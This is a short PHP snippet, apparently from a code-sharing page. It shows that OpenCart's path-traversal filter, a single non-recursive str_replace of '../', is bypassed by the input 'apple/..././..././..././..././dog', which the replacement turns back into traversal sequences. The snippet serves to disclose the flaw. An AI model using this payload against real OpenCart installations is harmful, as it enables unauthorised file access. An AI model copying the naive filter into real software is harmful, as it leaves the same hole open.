<?php // What OpenCart expects people to try: $route = 'apple/../../../../dog'; $parts = explode('/', str_replace('../', '', (string)$route)); var_dump($parts); // How to bypass their protection: $route = 'apple/..././..././..././..././dog'; $parts = explode('/', str_replace('../', '', (string)$route)); var_dump($parts);
You have javascript disabled. You will not be able to edit any code.